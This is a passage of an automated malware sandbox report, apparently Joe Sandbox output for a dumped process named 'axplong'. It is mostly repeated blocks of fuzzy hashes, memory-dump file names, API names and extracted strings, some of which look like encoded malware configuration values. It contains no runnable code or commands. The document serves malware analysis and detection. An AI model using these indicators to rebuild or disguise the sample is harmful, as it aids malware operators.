                    • Instruction Fuzzy Hash: F45198702FC74A56CB388E28B8977BE67AA9F02303F140459DC42D7681DBB19D2D871D
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c16088b5996927a9943f3d6bd2b0aaa8c0e08b9c80596280850544cc6a6e4ad8
                    • Instruction ID: a545225ddcf6d147409e193fd3b317c9dd3f72286d4044b87a3cd9aecfaff499
                    • Opcode Fuzzy Hash: c16088b5996927a9943f3d6bd2b0aaa8c0e08b9c80596280850544cc6a6e4ad8
                    • Instruction Fuzzy Hash: 4D225FB7F515144BDB0CCA9DDCA27EDB2E3AFD8314B0E803DA40AE3345EA79D9158A44
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e64a151d022aad8f8680a833e34ca38a667ca38a24e130c0eaa5b7e02219eb5
                    • Instruction ID: 8fed22e08e0dddfee103df0a04ade97ac654749b5073aeed6ed2d6f261437a2e
                    • Opcode Fuzzy Hash: 8e64a151d022aad8f8680a833e34ca38a667ca38a24e130c0eaa5b7e02219eb5
                    • Instruction Fuzzy Hash: EDB16D31224609DFD715CF2CD486B657BE0FF45368F258699E89ACF2A1C335E9A2CB40
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35f1e7fa35f632830b7a74c3af50c28ef6a69821c09a58f8607d26dc3e91b69f
                    • Instruction ID: ac1d8aec266a00125f99ede4e8b2b812a427ef9022e992bb9ca2e14f6b394be2
                    • Opcode Fuzzy Hash: 35f1e7fa35f632830b7a74c3af50c28ef6a69821c09a58f8607d26dc3e91b69f
                    • Instruction Fuzzy Hash: 3051E17061C3918FD319CF2C911563AFFE1AFD5200F484A9EE4DA87282D774DA48CBA2
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d9106406a63f8219e8703adfe38cd4c014a438e08db5a8ea0767afa889646fde
                    • Instruction ID: 76e72a91afc4b566910f024cfc61fc51ce8263b1f5c61beb59fb3e1cdb27d864
                    • Opcode Fuzzy Hash: d9106406a63f8219e8703adfe38cd4c014a438e08db5a8ea0767afa889646fde
                    • Instruction Fuzzy Hash: 8021B673F204394B770CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b34ae0a2d3266ea3389030542d0e9a162f83950f2f8a8d7d9237617a1940c93
                    • Instruction ID: 066ed02187b067c363e5f2a90124826f70b1de1faa6ec0b527ce7f78077c9b77
                    • Opcode Fuzzy Hash: 3b34ae0a2d3266ea3389030542d0e9a162f83950f2f8a8d7d9237617a1940c93
                    • Instruction Fuzzy Hash: A011A323F30C255A675C816D8C172BAA1D6EBD824031F433AD826EB284E9A4DE23D290
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: e6579cdc18c3216c9b92e51bdae4d00f02ceb919079ef70e03675ce9bb1ab614
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: F811387F22014347D6068E2DC8F46B6E796EAC5321B3C437AC1414B758DE22A9E4D900
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 083a0729048cb507e29ab938b33108d54ba35a576d4befb6a4e8ec9df00c768d
                    • Instruction ID: 0415830f266f4c1ec7fcccbe654430c356bb865e9c0a3ed3dc38d67e5f9b4408
                    • Opcode Fuzzy Hash: 083a0729048cb507e29ab938b33108d54ba35a576d4befb6a4e8ec9df00c768d
                    • Instruction Fuzzy Hash: 0DE08C31060A496FCE357F15C81DE983B6AEB0139AF908800FC084B221CB75ECA5DA84
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: b8c5b3e973cdbe8179101c3d8cf01609f6752db7b6337667e3dd0f3ab159cba4
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: E8E08C32921628EBCB15DBC8C905D8AF7ECEB48B11F158196F905E3240C2B0DF04CBD8
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                    • API String ID: 0-2390467879
                    • Opcode ID: 44a580a0cc6fb31d069299155ecb46850dee806ca71b1c7c7082c72b67337c38
                    • Instruction ID: 7ce26d9021094c629510a6571cff6483b592186a2ea23d2eed3f5379e82d0cf0
                    • Opcode Fuzzy Hash: 44a580a0cc6fb31d069299155ecb46850dee806ca71b1c7c7082c72b67337c38
                    • Instruction Fuzzy Hash: 9602C4B1920258EFEF14EFA8C849BDEBBB5EF05304F504158E805A7282D7759B94CFA1
                    APIs
                    • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0023795C
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00237968
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00237971
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                    • String ID: 'k#d+($@y#$d+(
                    • API String ID: 4078500453-556721154
                    • Opcode ID: 57641f2b168db26f60f7ad5537b045b4135edcd0848f4bf315381119147eb550
                    • Instruction ID: b84005f1db6930c89d2516156a03c6e82a5ea34ad6edecc0d94a125ce88d8f97
                    • Opcode Fuzzy Hash: 57641f2b168db26f60f7ad5537b045b4135edcd0848f4bf315381119147eb550
                    • Instruction Fuzzy Hash: DC31E5F29243059FDB30DF64E845B56B7E8EF14310F100A2EE945C7241E771EA64CBA1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcsrchr
                    • String ID: .bat$.cmd$.com$.exe
                    • API String ID: 1752292252-4019086052
                    • Opcode ID: bb57f53fa10fd64e0d1cbcb77d9aac3a451ff0c85f782679051c250bbfc08fa7
                    • Instruction ID: 857cfc4f1e7e2453f94f92521d831cf9571953269cec9394edb03f8941105b56
                    • Opcode Fuzzy Hash: bb57f53fa10fd64e0d1cbcb77d9aac3a451ff0c85f782679051c250bbfc08fa7
                    • Instruction Fuzzy Hash: F00142776786132216191819BC0263B17889B83BB5B15401BFD4CF73C1DE74EC794958
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcast
                    • String ID:
                    • API String ID: 32384418-0
                    • Opcode ID: d5dc02a273ce47b0c6c65175e8f53775677c9795cf72ceee497bf252303f43bf
                    • Instruction ID: 7a20c4b415c5a23b092c9244642ca4a7431d35529180240affaacb6180e0ffce
                    • Opcode Fuzzy Hash: d5dc02a273ce47b0c6c65175e8f53775677c9795cf72ceee497bf252303f43bf
                    • Instruction Fuzzy Hash: FFA1F3B0920326EFDB11DFA4D94579AB7B8FF15310F104129E819E7641EB35EA28CBD1
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00222806
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002228A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
